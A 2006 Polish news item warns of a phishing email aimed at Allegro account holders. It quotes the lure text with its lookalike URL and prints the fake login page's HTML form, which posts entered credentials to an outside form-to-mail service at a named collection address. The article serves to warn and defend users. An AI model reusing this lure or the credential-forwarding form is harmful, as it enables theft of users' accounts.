Próba wyłudzenia haseł do Allegro

10-04-2006, 21:41

Jak informuje jedna z użytkowniczek grupy usenetowej alt.pl.allegro, w sieci pojawił się spam typu phisherskiego mający na celu wyłudzenie haseł do kont Allegro.

Ujawniony przez użytkowniczkę o nicku MarylkA e-mail wysłany przez oszusta (lub oszustów) ma dość prostą formę:


Twoje konto w allegro.pl zostało dodane do listy ukradzionych. Prosze zalogować się na stronie podanej poniżej w celu sprawdzenia wiarygodności zgłoszenia tego poprzez innego użytkownika allegro.pl

www.allegro.serwus.pl

Jacek Kowalski,
Dział od spraw użytkownika.


Teoretycznie już na pierwszy rzut oka widać, iż wskazany adres znajduje się poza domeną Allegro. Jeśli jednak ktoś mimo wszystko wejdzie pod wskazany adres napotka stronę bliźniaczo podobną do strony logowania do Allegro. Wizualnie różnią się one tylko dwoma szczegółami: innym przyciskiem "zaloguj się" oraz brakiem linku przełączającego pomiędzy logowaniem standardowym i bezpiecznym (SSL).

Sam kod różni sie jednak w jeszcze jednym punkcie. Formularz zawiera bowiem linie:


<form method="POST" action="http://free4web.pl/Form2Mail/">
<input type="hidden" name="email" value="keyyyyylogg@o2.pl">


Tak więc jeśli ktoś będzie na tyle nieostrożny, iż wprowadzi swoje dane do fałszywego formularza, powędrują one w zupełnie inne miejsce, zaś sama strona wyświetli podrobiony komunikat błędu.

Źródło: alt.pl.allegro
Tematy pokrewne:  

tag spamtag phishingtag Allegro
  
znajdź w serwisie

RSS - Wywiad
Wywiad  
RSS - Interwencje
RSS - Porady
Porady  
RSS - Listy
Listy  
« Październik 2019»
PoWtŚrCzwPtSbNd
 123456
78910111213
14151617181920
21222324252627
28293031